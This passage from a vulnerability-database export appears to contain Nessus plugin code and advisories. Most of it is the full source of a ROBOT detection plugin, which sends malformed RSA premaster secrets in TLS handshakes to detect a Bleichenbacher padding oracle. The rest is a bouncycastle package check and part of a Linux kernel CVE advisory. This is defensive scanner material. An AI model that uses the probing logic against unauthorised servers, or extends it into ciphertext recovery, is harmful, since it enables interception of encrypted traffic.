(!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.1\", reference:\"bouncycastle-1.60-lp151.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"bouncycastle-javadoc-1.60-lp151.3.3.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bouncycastle / bouncycastle-javadoc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-06-16T04:24:15", "description": "The remote host is affected by an information disclosure\nvulnerability. The SSL/TLS service supports RSA key exchanges, and\nincorrectly leaks whether or not the RSA key exchange sent by a client\nwas correctly formatted. This information can allow an attacker to\ndecrypt previous SSL/TLS sessions or impersonate the server.\n\nNote that this plugin does not attempt to recover an RSA ciphertext,\nhowever it sends a number of correct and malformed RSA ciphertexts as\npart of an SSL handshake and observes how the server responds.\n\nThis plugin attempts to discover the vulnerability in multiple ways,\nby not completing the handshake and by completing it incorrectly, as\nwell as using a variety of cipher suites. Only the first method that\nfinds the service to be vulnerable is reported.\n\nThis plugin requires report paranoia as some services will\nreport as affected even though the issue is not exploitable.", "edition": 19, "cvss3": {"score": 5.9, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2019-11-08T00:00:00", "title": "Return Of Bleichenbacher's Oracle Threat (ROBOT) Information Disclosure", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-6168", "CVE-2012-5081", "CVE-2017-13099", "CVE-2017-17382", "CVE-2017-1000385", "CVE-2017-17428", "CVE-2016-6883", "CVE-2017-17427", "CVE-2017-13098", "CVE-2017-12373"], "modified": "2019-11-08T00:00:00", "cpe": [], "id": "SSL_ROBOT_BLEICHENBACHER.NASL", "href": "https://www.tenable.com/plugins/nessus/105415", "sourceData": "#TRUSTED 0d92a811cc67c8cc6759e43417981daf41aa1904c3067ac2609e8d8afb6175a963e06893d68399ffe0978402ff49dc0816fdd7b45617eab4cacf71b2dc1085b8d747ba44256594d0ed59e27e3f67648594ca4aaf15e66d7e2fb5f6f3ad7b4eeb98c60c5b3dbc1bd43646c302038a396b9fe02e0d058bc32b1b716e6210576207e1a3c17ffee711d90b5b458337281fcead62e72e009ea93b69279f811e3bd64a792374cfafe80798d88d2272d8dfb459c37b03c20eed03b228ea0e53cbfcc9cb63a5b54b3a0e41f4d182c6615e4a1e58d261f420756dbbd41d41cea5568af40eccaa2170361e91153bfc228282a0fb9a88e5f3ecdace3b668c2ad70f455b57f92628534e46c72b80a18b9ee6f8630dab36f17dff3d30cf13bb829659204bade55191c4c944a77443f192804765bc9e67bbacee723e4d063a70a7c3e9a1aff6d4499dd36f0d43ddff1a22afef3fb69e0ad60c9924a9bf89f07b6e7f0b260418d572fd12ef9307d531f7db3c364e4c265b5e9d90affb3e7992b5b674bc1e1f72ca47255216002a2f647f34be919df14070b5b6a18eeab5185cfa943443bad0c6594cb78c1ce59a998883ce884cbc5ebb833088b604420ad31edfca0d40290c1bc5c8eebcb2d64c8579ae4061945d82ed04415e9e0da6388d9dd3bcdc7137943470451ce02eea72b1b7eb0516687fd81ff6f2199411b47a2efc4793009ebad4d884\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105415);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/06/12\");\n\n script_cve_id(\n \"CVE-2012-5081\",\n \"CVE-2016-6883\",\n \"CVE-2017-6168\",\n \"CVE-2017-12373\",\n \"CVE-2017-13098\",\n \"CVE-2017-13099\",\n \"CVE-2017-17382\",\n \"CVE-2017-17427\",\n \"CVE-2017-17428\",\n \"CVE-2017-1000385\"\n );\n\n script_name(english:\"Return Of Bleichenbacher's Oracle Threat (ROBOT) Information Disclosure\");\n script_summary(english:\"Checks if the server leaks whether an RSA ciphertext is correctly formatted\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The server leaks whether or not an RSA-encrypted ciphertext is\nformatted correctly.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is affected by an information disclosure\nvulnerability. The SSL/TLS service supports RSA key exchanges, and\nincorrectly leaks whether or not the RSA key exchange sent by a client\nwas correctly formatted. This information can allow an attacker to\ndecrypt previous SSL/TLS sessions or impersonate the server.\n\nNote that this plugin does not attempt to recover an RSA ciphertext,\nhowever it sends a number of correct and malformed RSA ciphertexts as\npart of an SSL handshake and observes how the server responds.\n\nThis plugin attempts to discover the vulnerability in multiple ways,\nby not completing the handshake and by completing it incorrectly, as\nwell as using a variety of cipher suites. Only the first method that\nfinds the service to be vulnerable is reported.\n\nThis plugin requires report paranoia as some services will\nreport as affected even though the issue is not exploitable.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://robotattack.org/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.f5.com/csp/article/K21905460\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.citrix.com/article/CTX230238\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20171212-bleichenbacher\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?953be8c5\");\n script_set_attribute(attribute:\"see_also\", value:\"http://erlang.org/pipermail/erlang-questions/2017-November/094257.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to a patched version of the software. Alternatively, disable\nRSA key exchanges.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-17428\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/12/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/11/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"General\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssl_supported_versions.nasl\");\n script_require_keys(\"Settings/ParanoidReport\");\n script_require_ports(\"SSL/Supported\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"x509_func.inc\");\ninclude(\"rsync.inc\");\ninclude(\"ftp_func.inc\");\ninclude(\"ldap_func.inc\");\ninclude(\"nntp_func.inc\");\ninclude(\"smtp_func.inc\");\ninclude(\"telnet2_func.inc\");\ninclude(\"ssl_funcs.inc\");\ninclude(\"string.inc\");\ninclude(\"spad_log_func.inc\");\n\n# Paranoia added as some services are not exploitable\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\n##\n# Checks whether a cipher is in a list of cipher suites.\n#\n# @anonparam cipher Cipher in question.\n# @anonparam ciphers List of cipher suites.\n#\n# @return TRUE for success, FALSE otherwise.\n##\nfunction tls_cipher_in_list()\n{\n local_var cipher, ciphers, i, id, len;\n\n cipher = _FCT_ANON_ARGS[0];\n ciphers = _FCT_ANON_ARGS[1];\n\n len = strlen(ciphers);\n for (i = 0; i < len; i += 2)\n {\n id = substr(ciphers, i, i + 2 - 1);\n if (cipher == id) return TRUE;\n }\n\n return FALSE;\n}\n\nPREMASTER_TYPE_CORRECT = 2;\nPREMASTER_TYPE_WRONG_FIRST_BYTES = 3;\nPREMASTER_TYPE_WRONG_ZERO_POS = 4;\nPREMASTER_TYPE_MISSING_ZERO = 5;\nPREMASTER_TYPE_WRONG_VERSION = 6;\nfunction make_premaster(modulus_length, premaster_type)\n{\n local_var pad_length, premaster;\n # See https://tools.ietf.org/html/rfc2246#section-7.4.7.1\n # PKCS#1 v1.5 format: [2 header bytes + nonzero padding + 0x00 byte + 2-byte version + 46-byte premaster]\n pad_length = (modulus_length - 2 - 1 - 2 - 46);\n premaster = \"nessusnessusnessusnessusnessusnessusnessusness\";\n\n switch (premaster_type)\n {\n case PREMASTER_TYPE_CORRECT:\n return '\\x00\\x02' + crap(data:'N', length:pad_length) + '\\x00\\x03\\x03' + premaster;\n case PREMASTER_TYPE_WRONG_FIRST_BYTES:\n return '\\x05\\x05' + crap(data:'N', length:pad_length) + '\\x00\\x03\\x03' + premaster;\n case PREMASTER_TYPE_WRONG_ZERO_POS:\n return '\\x00\\x02' + crap(data:'N', length:pad_length) + '\\xff' + premaster + '\\x00\\x11';\n case PREMASTER_TYPE_MISSING_ZERO:\n return '\\x00\\x02' + crap(data:'N', length:pad_length) + '\\xff\\x03\\x03' + premaster;\n case PREMASTER_TYPE_WRONG_VERSION:\n return '\\x00\\x02' + crap(data:'N', length:pad_length) + '\\x00\\x05\\x05' + premaster;\n }\n}\n\n##\n# We don't generate the premaster ahead of time, in case the\n# server sends a different RSA certificate depending on ciphersuite.\n##\nfunction attack(port, ciphers, premaster_type, send_tls_finished_msg)\n{\n local_var soc, data, rec, srv_random, clt_random, version, cipher_desc;\n local_var cert, clt_cert_requested, skex, n, e, dh_privkey;\n local_var ckex, keyblk, tls_keys, tls_ciphertext, pubkey, ivlen, maclen, blocklen;\n local_var result, bpf, packet, err, ip_header_size, tcp_header, fin, rst;\n local_var loop_count;\n\n # Get a socket to perform a handshake.\n soc = open_sock_ssl(port);\n if (!soc)\n return [FALSE, \"open_sock_ssl\", \"Couldn't begin SSL handshake\"];\n\n data = client_hello(\n v2hello:FALSE,\n version:mkword(SSL_V3), # Record-layer version (RFC5246 Appendix E)\n maxver:mkword(TLS_12), # Handshake version; maximum we support\n cipherspec:ciphers,\n extensions:tls_ext_sni(hostname:get_host_name())\n );\n # Send the ClientHello\n send(socket:soc, data:data);\n\n # Read records one at a time. Expect to see at a minimum:\n # ServerHello, Certificate, and ServerHelloDone.\n loop_count = 0;\n while (TRUE)\n {\n if (loop_count++ > 50)\n exit(1, \"Exceeded maximum number of loops while waiting for server's first flight of messages.\");\n\n # Receive a record from the server.\n data = recv_ssl(socket:soc);\n if (isnull(data))\n {\n close(soc);\n return [FALSE, \"recv_ssl\", \"Did not receive an expected SSL message from the server\"];\n }\n\n # ServerHello: Extract the random data for computation of keys.\n rec = ssl_find(\n blob:data,\n 'content_type', SSL3_CONTENT_TYPE_HANDSHAKE,\n 'handshake_type', SSL3_HANDSHAKE_TYPE_SERVER_HELLO\n );\n if (!isnull(rec))\n {\n # If server asks for version less than SSLv3 or higher than TLS 1.2, fail.\n if (rec['handshake_version'] < SSL_V3 || rec['handshake_version'] > TLS_12)\n return [FALSE, \"handshake_version\", \"Server selected a TLS version we don't support\"];\n\n # Use the TLS version the server wants\n version = rec['handshake_version'];\n\n srv_random = mkdword(rec['time']) + rec['random'];\n\n # Wacko SSL servers might return a cipher suite not in the\n # client's request list.\n if (!tls_cipher_in_list(mkword(rec['cipher_spec']), ciphers))\n {\n close(soc);\n return [FALSE, \"cipher_spec\", \"Server ignored our list of supported ciphers\"];\n }\n\n # Store the negotiated cipher suite.\n cipher_desc = ciphers_desc[cipher_name(id:rec['cipher_spec'])];\n\n if (isnull(cipher_desc))\n {\n close(soc);\n return [FALSE, \"cipher_spec\", \"Assertion failure\"];\n }\n }\n\n # Certificate: Extract the server's public key.\n rec = ssl_find(\n blob:data,\n 'content_type', SSL3_CONTENT_TYPE_HANDSHAKE,\n 'handshake_type', SSL3_HANDSHAKE_TYPE_CERTIFICATE\n );\n if (!isnull(rec) && max_index(rec['certificates']) > 0)\n {\n # First cert in the chain should be the server cert.\n cert = parse_der_cert(cert:rec['certificates'][0]);\n if (isnull(cert))\n {\n close(soc);\n return [FALSE, \"parse_der_cert\", \"Failed to parse server's certificate\"];\n }\n cert = cert['tbsCertificate'];\n }\n\n # Server Key Exchange.\n # Normally RSA handshakes don't have this, but we can check EXPORT ciphers this way.\n rec = ssl_find(\n blob:data,\n 'content_type', SSL3_CONTENT_TYPE_HANDSHAKE,\n 'handshake_type', SSL3_HANDSHAKE_TYPE_SERVER_KEY_EXCHANGE\n );\n if (!isnull(rec['data']))\n skex = ssl_parse_srv_kex(blob:rec['data'], cipher:cipher_desc, version:version);\n\n # Certificate Request.\n rec = ssl_find(\n blob:data,\n 'content_type', SSL3_CONTENT_TYPE_HANDSHAKE,\n 'handshake_type', SSL3_HANDSHAKE_TYPE_CERTIFICATE_REQUEST\n );\n if (!isnull(rec['data']))\n clt_cert_requested = TRUE;\n\n # Server Hello Done.\n rec = ssl_find(\n blob:data,\n 'content_type', SSL3_CONTENT_TYPE_HANDSHAKE,\n 'handshake_type', SSL3_HANDSHAKE_TYPE_SERVER_HELLO_DONE\n );\n # When we get a ServerHelloDone, it's our turn to send again.\n if (!isnull(rec))\n break;\n\n # Is it an alert?\n rec = ssl_find(\n blob:data,\n encrypted:FALSE,\n 'content_type', SSL3_CONTENT_TYPE_ALERT\n );\n if (!isnull(rec))\n {\n close(soc);\n return [FALSE, \"handshake_failure\", \"Server sent alert to ClientHello. Level: \" + rec['level'] + \", description: \" + rec['description']];\n }\n }\n\n data = '';\n # Create an empty client certificate if one is requested.\n if (clt_cert_requested)\n {\n # Send an empty certificate for now. TLSv1.0 says the client can\n # send an empty certificate.\n data += ssl_mk_record(\n type:SSL3_CONTENT_TYPE_HANDSHAKE,\n version:version,\n data:ssl_mk_handshake_msg(\n type : SSL3_HANDSHAKE_TYPE_CERTIFICATE,\n data : ssl_vldata_put(data:NULL,len:3)\n )\n );\n }\n\n # Process ServerCertificate and ServerKeyExchange messages.\n if (cipher_field(name:cipher_desc, field:\"kex\") !~ \"RSA($|\\()\")\n {\n close(soc);\n return [FALSE, \"kx\", \"Unsupported key exchange method\"];\n }\n\n if (isnull(cert))\n {\n close(soc);\n return [FALSE, \"rsa_kx\", \"Server selected RSA key exchange but didn't provide a certificate\"];\n }\n\n if (isnull(cert['subjectPublicKeyInfo']) || isnull(cert['subjectPublicKeyInfo'][1]))\n {\n close(soc);\n return [FALSE, \"rsa_kx\", \"A server certificate with an unsupported algorithm was found.\"];\n }\n\n n = cert['subjectPublicKeyInfo'][1][0];\n e = cert['subjectPublicKeyInfo'][1][1];\n\n if (isnull(n) || isnull(e))\n {\n close(soc);\n return [FALSE, \"rsa_kx\", \"Failed to extract public key from server certificate.\"];\n }\n\n # Round-trip the modulus to get rid of any leading zeroes.\n n = bn_hex2raw(bn_raw2hex(n));\n\n # Encrypt the premaster secret with server's RSA public key.\n ckex = bn_mod_exp(make_premaster(modulus_length:strlen(n), premaster_type:premaster_type), e, n);\n ckex = ssl_vldata_put(data:ckex, len:2);\n\n # Create a ClientKeyExchange record\n data += ssl_mk_record(\n type:SSL3_CONTENT_TYPE_HANDSHAKE,\n version:version,\n data:ssl_mk_handshake_msg(\n type:SSL3_HANDSHAKE_TYPE_CLIENT_KEY_EXCHANGE,\n data:ckex\n )\n );\n\n if (send_tls_finished_msg)\n {\n data += tls_mk_record(\n type:SSL3_CONTENT_TYPE_CHANGECIPHERSPEC,\n data:mkbyte(1),\n version:version\n );\n\n # Figure out IV, MAC, and padding length of the cipher we're using. If we\n # send an incorrectly-sized Finished message, the server can reject us\n # without ever attempting to decrypt it, and we don't want this. We want it\n # to look legitimate and for the server to give us it's real \"decryption\n # failed\" alert.\n var encrypt = cipher_field(name:cipher_desc, field:\"encrypt\");\n if (\"AES-GCM\" >< encrypt)\n {\n ivlen = 8;\n maclen = 16;\n # AES-GCM uses AES-CTR under the hood; it's a stream cipher\n blocklen = 1;\n }\n else\n {\n if (\"3DES-CBC\" >< encrypt || \"DES-CBC\" >< encrypt)\n blocklen = 8;\n else if (\"AES-CBC\" >< encrypt)\n blocklen = 16;\n # Used in China\n else if (\"Camellia\" >< encrypt)\n blocklen = 16;\n # Used in South Korea\n else if (\"SEED-CBC\" >< encrypt)\n blocklen = 16;\n # Safe guess; SSL implementations check that a ciphertext is divisible by the block length.\n # DES block length (8) and AES and CAMELLIA block length (16) both evenly divide 16.\n else\n blocklen = 16;\n\n # These CBC ciphers all use an IV length that's the same as the block length\n ivlen = blocklen;\n\n # MAC will be either SHA256 or SHA1. There are no SHA384 ciphersuites using a CBC-mode cipher.\n if (\"SHA256\" >< cipher_field(name:cipher_desc, field:\"mac\"))\n maclen = 32;\n else\n maclen = 20;\n }\n\n # Make a fake Finished message. This is designed to trigger a bad_record_mac\n # or similar TLS alert. The encrypted \"finished hash\" is 12 bytes, so we\n # start with that. We tack on a fake MAC, and round up to the nearest block\n # size as if it were properly encrypted.\n tls_ciphertext = ssl_mk_handshake_msg(type:SSL3_HANDSHAKE_TYPE_FINISHED, data:crap(data:'Finished', length:12));\n # Tag on the fake MAC\n tls_ciphertext += crap(data:'Mac', length:maclen);\n # Add on some bytes to satisfy padding length requirements, if it's a block cipher\n if (blocklen > 1)\n tls_ciphertext += crap(data:'Padding', length:blocklen - (strlen(tls_ciphertext) % blocklen));\n\n # Add on an explicit IV if we're using TLS v1.1 or higher\n if (version >= TLS_11)\n tls_ciphertext = crap(data:'Iv', length:ivlen) + tls_ciphertext;\n\n data += tls_mk_record(\n type:SSL3_CONTENT_TYPE_HANDSHAKE,\n data:tls_ciphertext,\n version:version\n );\n }\n\n if (isnull(soc) || port <= 0 || get_source_port(soc) <= 0)\n exit(1, \"Invalid socket for a packet capture instance (dest port \"+string(get_source_port(soc))+\", src port \"+string(port)+\").\");\n\n # Try to catch the server closing the connection. We want to catch either an RST or a FIN.\n bpf = bpf_open(\n 'tcp and src port ' + port +\n ' and src host ' + get_host_ip() +\n ' and dst host ' + compat::this_host() +\n ' and dst port ' + get_source_port(soc) +\n ' and tcp[tcpflags] & (tcp-fin|tcp-rst) != 0'\n );\n if (!bpf)\n exit(1, \"Couldn't open a packet capture instance.\");\n\n # Send the TLS messages\n # If we're using the full handshake this will be ClientKeyExchange + ChangeCipherSpec + Finished\n # If we're using the abbbreviated handshake this will be just ClientKeyExchange\n send(socket:soc, data:data);\n\n # The \"fingerprint\" of the server's behaviour for this one probe\n result = [];\n\n # The effect of this loop is to receive as many times as possible and store\n # all the TLS records received. Allegedly, some implementations will send\n # more than TLS alert (!?).\n # At the end when nothing more can be received, we check why; did the server\n # leave the connection open and just stop sending, or close with a FIN or\n # RST? And then add that onto the end of the list.\n # The idea is this becomes a \"fingerprint\" of the server's behaviour, and\n # then we can compare fingerprints from the different types of malformed\n # premaster secret and see if an oracle exists.\n loop_count = 0;\n while (TRUE)\n {\n if (loop_count++ > 50)\n exit(1, \"Exceeded maximum number of loops while waiting for server's response to tampered RSA key exchange.\");\n\n # Receive a record from the server.\n # Set the timeout explicitly, because we don't want to be affected by the\n # Nessus's check_read_timeout setting.\n data = recv_ssl(socket:soc, timeout:5);\n if (isnull(data))\n {\n if (socket_get_error(soc) == ETIMEDOUT)\n {\n result[max_index(result)] = \"server waited\";\n }\n else if (socket_get_error(soc) == ECONNRESET)\n {\n # Try to tell apart FIN and RST\n packet = bpf_next(bpf:bpf, timeout:0);\n if (isnull(packet))\n {\n err = \"Did not receive an expected FIN or RST packet from port \" + port;\n }\n else\n {\n if (TARGET_IS_IPV6)\n ip_header_size = 40;\n else\n ip_header_size = 20;\n # Carve out the TCP header\n tcp_header = substr(packet, 14 + ip_header_size, 14 + ip_header_size + 20);\n fin = ord(tcp_header[13]) & 1;\n rst = ord(tcp_header[13]) & 4;\n if (fin)\n result[max_index(result)] = \"server sent TCP FIN\";\n else if (rst)\n result[max_index(result)] = \"server sent TCP RST\";\n else\n {\n err = \"Did not receive an expected FIN or RST packet from port \" + port;\n }\n }\n }\n else\n {\n err = \"Unexpected socket error status after receiving: \" + socket_get_error(soc);\n }\n\n bpf_close(bpf);\n close(soc);\n\n if (err)\n exit(1, err + \".\");\n else\n break;\n }\n\n # Is it an alert?\n rec = ssl_find(\n blob:data,\n encrypted:FALSE,\n 'content_type', SSL3_CONTENT_TYPE_ALERT\n );\n if (!isnull(rec))\n result[max_index(result)] = \"server sent TLS alert \" + string(rec['description']);\n }\n return result;\n}\n\nget_kb_item_or_exit('SSL/Supported');\n# Get a port that uses SSL.\nport = get_ssl_ports(fork:TRUE);\nif (isnull(port))\n exit(1, 'The host does not appear to have any SSL-based services.');\n\n# Find out if the port is open.\nif (!get_port_state(port))\n audit(AUDIT_PORT_CLOSED, port, \"TCP\");\n\n# CBC ciphers that don't use AES\ncipher_list_cbc_not_aes =\n ciphers['TLS1_CK_RSA_WITH_3DES_EDE_CBC_SHA'] +\n ciphers['TLS1_CK_RSA_WITH_CAMELLIA_128_CBC_SHA'] +\n ciphers['TLS1_CK_RSA_WITH_CAMELLIA_256_CBC_SHA'] +\n ciphers['TLS1_CK_RSA_WITH_SEED_CBC_SHA'];\n\n# Just AES-CBC ciphers\ncipher_list_aes_cbc =\n ciphers['TLS1_CK_RSA_WITH_AES_128_CBC_SHA'] + # <- Required by all TLS 1.2 impls.\n ciphers['TLS1_CK_RSA_WITH_AES_256_CBC_SHA'] +\n ciphers['TLS1_RSA_WITH_AES_128_CBC_SHA256'] +\n ciphers['TLS1_RSA_WITH_AES_256_CBC_SHA256'];\n\n# Just AES-GCM ciphers\ncipher_list_gcm =\n ciphers['TLS12_RSA_WITH_AES_128_GCM_SHA256'] +\n ciphers['TLS12_RSA_WITH_AES_256_GCM_SHA384'];\n\n# This just collects the responses for all the premasters and returns them.\n# If there was a handshake error or if the responses were all the same,\n# NULL is returned.\nfunction try_with_all_premasters(cipher_list, port, send_tls_finished_msg)\n{\n local_var response, responses, premasters, premaster, correct_premaster_reponse;\n\n premasters = [\n PREMASTER_TYPE_CORRECT,\n PREMASTER_TYPE_WRONG_FIRST_BYTES,\n PREMASTER_TYPE_WRONG_ZERO_POS,\n PREMASTER_TYPE_MISSING_ZERO,\n PREMASTER_TYPE_WRONG_VERSION\n ];\n\n spad_log(message:\"Port: \" + port + \", ciphers: \" + hexstr(cipher_list) + \", send_tls_finished_msg: \" + int(send_tls_finished_msg) + \".\");\n responses = [];\n foreach premaster (premasters)\n {\n response = attack(\n port:port,\n ciphers:cipher_list,\n premaster_type:premaster,\n send_tls_finished_msg:send_tls_finished_msg\n );\n # The return value is like [FALSE, \"step\", \"human-readable message\"] when\n # there's a connection error.\n # If there was a connection error it's probably because the server doesn't\n # support the ciphers we tried with, so bail out early here.\n if (typeof(response[0]) == \"int\" && response[0] == FALSE)\n {\n spad_log(message:\"Connection failed: \" + response[2] + \".\");\n return NULL;\n }\n\n responses[len(responses)] = response;\n }\n spad_log(message:\"All premasters tested. Ciphers appear supported.\");\n\n foreach response (responses)\n {\n # If the server replied differently to any of the malformed premasters\n # that we tried, compared to the correctly-formatted premaster, then\n # the server is vulnerable.\n correct_premaster_reponse = responses[0];\n if (!equals(correct_premaster_reponse, response))\n return responses;\n }\n\n # All the responses were the same. Server isn't vulnerable to this particular attack.\n return NULL;\n}\n\n# We'll try with the full handshake first. It's faster, because we always end\n# with sending an invalid encrypted Finished message, which the server can\n# respond to immediately.\n# When we don't send a Finished and stop after sending the ClientKeyExchange,\n# the *correct* thing for the server to do is to wait and so we'll end up\n# waiting a lot.\nforeach send_tls_finished_msg ([TRUE, FALSE])\n{\n foreach cipher_list ([cipher_list_gcm, cipher_list_aes_cbc + cipher_list_cbc_not_aes])\n {\n responses = try_with_all_premasters(\n cipher_list:cipher_list,\n port:port,\n send_tls_finished_msg:send_tls_finished_msg\n );\n # We get back null if the server isn't vulnerable with these\n # ciphers, or if the server didn't support them at all.\n if (isnull(responses))\n continue;\n\n # We got back a list of responses. Try the same attack once more and compare\n # the responses to the first attempt. If they're the same, then the server\n # is vulnerable.\n # We try twice because this is what the other detection tools do, and it makes\n # sense because some of the oracles rely on the server timing out.\n responses2 = try_with_all_premasters(\n cipher_list:cipher_list,\n port:port,\n send_tls_finished_msg:send_tls_finished_msg\n );\n # This does a deep equality check.\n if (equals(responses2, responses))\n {\n if (send_tls_finished_msg)\n attack_type = \"sent a TLS Finished message with incorrect padding\";\n else\n attack_type = \"waited, without sending a TLS Finished message\";\n\n report =\n '\\nThe test sent a crafted RSA ciphertext and then ' + attack_type + '.' +\n '\\nThe following differences in behaviour were seen by Nessus :' +\n '\\n - As a baseline with correct formatting : ' + join(responses[0], sep:', ') +\n '\\n - With incorrect leading bytes : ' + join(responses[1], sep:', ') +\n '\\n - With the 0x00 byte in incorrect place : ' + join(responses[2], sep:', ') +\n '\\n - With the 0x00 byte missing : ' + join(responses[3], sep:', ') +\n '\\n - With an incorrect version number : ' + join(responses[4], sep:', ');\n security_report_v4(\n port:port,\n extra:report,\n severity:SECURITY_HOLE\n );\n exit(0);\n }\n }\n}\nexit(0, \"The SSL/TLS service at port \" + port + \" does not appear to be vulnerable.\");\n", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2021-03-01T07:39:59", "description": "It was discovered that the alarmtimer implementation in the Linux\nkernel contained an integer overflow vulnerability. A local attacker\ncould use this to cause a denial of service. (CVE-2018-13053)\n\nWen Xu discovered that the XFS filesystem implementation in the Linux\nkernel did not properly track inode validations. An attacker could use\nthis to construct a malicious XFS image that, when mounted, could\ncause a denial of service (system crash). (CVE-2018-13093)\n\nWen Xu discovered that the f2fs file system implementation in the\nLinux kernel did not properly validate metadata. An attacker could use\nthis to construct a malicious f2fs image that, when mounted, could\ncause a denial of service (system crash). (CVE-2018-13096,\nCVE-2018-13097, CVE-2018-13098, CVE-2018-13099, CVE-2018-13100,\nCVE-2018-14614, CVE-2018-14615, CVE-2018-14616)\n\nWen Xu and Po-Ning Tseng discovered that btrfs file system\nimplementation in the Linux kernel did not properly validate metadata.\nAn attacker could use this to construct a malicious btrfs image that,\nwhen mounted, could cause a denial of service (system crash).\n(CVE-2018-14609, CVE-2018-14610, CVE-2018-14611, CVE-2018-14612,\nCVE-2018-14613)\n\nWen Xu discovered that the HFS+ filesystem implementation in the Linux\nkernel did not properly handle malformed catalog data in some\nsituations. An attacker could use this to construct a malicious HFS+\nimage that, when mounted, could cause a denial of service (system\ncrash). (CVE-2018-14617)\n\nVasily Averin and Pavel Tikhomirov discovered that the cleancache\nsubsystem of the Linux kernel did not properly initialize new files in\nsome situations. A local attacker could use this to expose sensitive\ninformation. (CVE-2018-16862)\n\nHui Peng and Mathias Payer discovered that the Option USB High Speed\ndriver in the Linux kernel did not properly validate metadata received\nfrom the device. A physically proximate attacker could use this to\ncause a denial of service (system crash). (CVE-2018-19985)\n\nHui Peng and Mathias Payer discovered that the USB subsystem in the\nLinux kernel did not properly handle size checks when handling an\nextra USB descriptor. A physically proximate attacker could use this\nto cause a denial of service (system crash). (CVE-2018-20169)\n\nZhipeng Xie discovered that an infinite loop could triggered in the\nCFS Linux kernel process scheduler. A local attacker could possibly\nuse this to cause a denial of service. (CVE-2018-20784)\n\nIt was discovered that a use-after-free error existed in the block\nlayer subsystem of the Linux kernel when certain failure conditions\noccurred. A local attacker could possibly use this to cause a denial\nof service (system crash) or possibly execute arbitrary code.\n(CVE-2018-20856)\n\nEli Biham and Lior Neumann discovered that the Bluetooth\nimplementation in the Linux kernel did not properly validate elliptic\ncurve parameters during Diffie-Hellman key exchange in some\nsituations. An attacker could use this to expose sensitive\ninformation. (CVE-2018-5383)\n\nIt was discovered that the Intel wifi device driver in the Linux\nkernel did not properly validate certain Tunneled Direct Link Setup\n(TDLS). A physically proximate attacker could use this to cause a\ndenial of service (wifi disconnect). (CVE-2019-0136)\n\nIt was discovered that a heap buffer overflow existed in the Marvell\nWireless LAN device driver for the Linux kernel. An attacker could use\nthis to cause a denial of service (system crash) or possibly execute\narbitrary code. (CVE-2019-10126)\n\nIt was discovered that the Bluetooth UART implementation in the Linux\nkernel did not properly check for missing tty operations. A local\nattacker could use this to cause a denial of service. (CVE-2019-10207)\n\nAmit Klein and Benny Pinkas discovered that the Linux kernel did not\nsufficiently randomize IP ID values generated for connectionless\nnetworking protocols. A remote attacker could use this to track\nparticular Linux devices. (CVE-2019-10638)\n\nAmit Klein and Benny Pinkas discovered that the location of kernel\naddresses could exposed by the implementation of connection-less\nnetwork protocols in the Linux kernel. A remote attacker could\npossibly use this to assist in the exploitation of another\nvulnerability in the Linux kernel. (CVE-2019-10639)\n\nAdam Zabrocki discovered that the Intel i915 kernel mode graphics\ndriver in the Linux kernel did not properly restrict mmap() ranges in\nsome situations. A local attacker could use this to cause a denial of\nservice (system crash) or possibly execute arbitrary code.\n(CVE-2019-11085)\n\nIt was discovered that an integer overflow existed in the Linux kernel\nwhen reference counting pages, leading to potential use-after-free\nissues. A local attacker could use this to cause a denial of service\n(system crash) or possibly execute arbitrary code. (CVE-2019-11487)\n\nJann Horn discovered that a race condition existed 